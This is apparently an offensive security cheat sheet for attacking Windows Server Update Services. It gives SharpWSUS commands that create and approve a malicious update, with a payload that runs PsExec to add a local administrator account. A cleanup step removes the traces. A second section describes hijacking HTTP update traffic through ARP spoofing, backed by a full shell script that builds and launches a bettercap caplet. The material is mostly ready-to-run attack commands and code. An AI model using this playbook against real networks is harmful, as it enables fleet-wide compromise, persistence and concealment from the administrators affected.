
Windows Server Update Services (WSUS)

Push a malicious update to the client computers

1) Locate the WSUS server

./SharpWSUS.exe locate

2) Find a way to compromise it; the remaining SharpWSUS commands are run on the compromised WSUS server

3) Enumerate the contents of the WSUS server (computers, groups and existing updates) to determine which machines to target

./SharpWSUS.exe inspect

4) Create a malicious patch. The payload file must be a Microsoft-signed binary (mandatory: the client verifies the file signature before executing it), so the actual command is passed in the arguments of a signed binary such as PsExec

./SharpWSUS.exe create /payload:"C:\tmp\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user user1 Password123! /add && net localgroup administrators user1 /add\"" /title:"EvilWSUS"

5) Create a WSUS group, add the target machine to it and approve the malicious patch for deployment to that group (the update ID is the GUID printed by the create step)

./SharpWSUS.exe approve /updateid:<GUID_from_create> /computername:<target> /groupname:"Evil Group"

6) Wait for the client to download the patch; the client's update check cannot be forced from the server side. Check whether the target has picked up the update:

./SharpWSUS.exe check /updateid:<GUID_from_create> /computername:<target>

7) Clean up once the patch has been downloaded: remove the approval, the computer group and the update from the WSUS server (SharpWSUS provides a delete action for this)

Spoof the WSUS server and hijack the update when the client reaches WSUS over HTTP instead of HTTPS

1) Find the WSUS server from the client's Windows Update policy in the registry: the WUServer value under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate (with UseWUServer set to 1 under its AU subkey). The hijack only works if that URL starts with http://; a client configured with an https:// WSUS URL validates the server certificate and is not affected

2) Set up the fake WSUS server on the attacker host, listening on the same port the client uses for WSUS (8530 is the default for HTTP)

3) ARP-spoof the target with bettercap, driven by a wsus_spoofing.cap caplet that does a quick recon of the network, sets up the ARP spoofing against the target client, reroutes the target's traffic aimed at the real WSUS server's port to the fake server, reduces logging and verbosity, and finally starts the modules

4) Then, with the fake WSUS server listening and bettercap rerouting the traffic, wait for the client's next update check or trigger one manually if you have GUI access to the machine (Check for updates in the Windows Update settings)
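The spoofing procedure above as one added worked example (not code from the original page): a POSIX shell script that takes the WUServer value read from the client's registry, refuses to proceed when the URL is https://, generates the wsus_spoofing.cap caplet with the phases listed in step 3, and launches bettercap with it. The interface name, the addresses and the choice of fake WSUS server are assumptions for illustration, not values from the page.

```shell
#!/bin/sh
# Added example, not code from the original page. Interface name, addresses
# and the fake server are placeholders/assumptions for the engagement at hand.
set -eu

# Parse the client's WUServer policy value. Prints "host port" and returns 0
# for an http:// URL. Returns 1 for https:// (or anything else): with TLS the
# client validates the server certificate, so the rerouted connection fails.
wsus_url_parse() {
    url="$1"
    case "$url" in
        http://*) ;;
        *) return 1 ;;
    esac
    hostport="${url#http://}"
    hostport="${hostport%%/*}"
    host="${hostport%%:*}"
    if [ "$hostport" = "$host" ]; then
        port=8530               # WSUS default port for plain HTTP (8531 is HTTPS)
    else
        port="${hostport##*:}"
    fi
    printf '%s %s\n' "$host" "$port"
}

# Emit the wsus_spoofing.cap caplet. Arguments: attacker interface, target
# client IP, real WSUS server IP, fake WSUS server IP, WSUS port.
# any.proxy semantics: packets from the ARP-spoofed target going to
# src_address:src_port are redirected to dst_address:dst_port.
gen_wsus_caplet() {
    iface="$1"; target="$2"; wsus="$3"; fake="$4"; port="$5"
    cat <<EOF
# quick recon of the network
net.probe on
net.recon on
# set the ARP spoofing: poison only the target, client->server direction only
set arp.spoof.targets ${target}
set arp.spoof.internal false
set arp.spoof.fullduplex false
# reroute traffic aimed at the WSUS server (TCP/${port}) to the fake server
set any.proxy.iface ${iface}
set any.proxy.protocol TCP
set any.proxy.src_address ${wsus}
set any.proxy.src_port ${port}
set any.proxy.dst_address ${fake}
set any.proxy.dst_port ${port}
# control logging and verbosity
events.ignore endpoint
events.ignore net.sniff.mdns
# start the modules
arp.spoof on
any.proxy on
EOF
}

# Usage: sh wsus_spoof.sh <iface> <target_ip> <wsus_ip> <fake_ip> <WUServer URL>
# e.g.:  sh wsus_spoof.sh eth0 192.168.2.2 192.168.2.3 192.168.2.4 http://wsus.corp.local:8530
# The fake WSUS server must already be listening on <fake_ip>:<port> (the page
# does not name one; GoSecure's pywsus is a common choice) before bettercap
# starts redirecting the client's connections.
if [ "$#" -ge 5 ]; then
    if ! hp=$(wsus_url_parse "$5"); then
        echo "WUServer is not an http:// URL: the client uses HTTPS, hijack not possible" >&2
        exit 1
    fi
    port="${hp##* }"
    gen_wsus_caplet "$1" "$2" "$3" "$4" "$port" > wsus_spoofing.cap
    sudo bettercap -iface "$1" -caplet wsus_spoofing.cap
fi
```

The http:// check is deliberately the first thing the script does: everything after it is wasted effort (and noisy ARP traffic) if the client's WUServer points at an https:// URL. The caplet limits arp.spoof to the single target and disables full-duplex spoofing because only the client-to-server direction needs to be intercepted.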
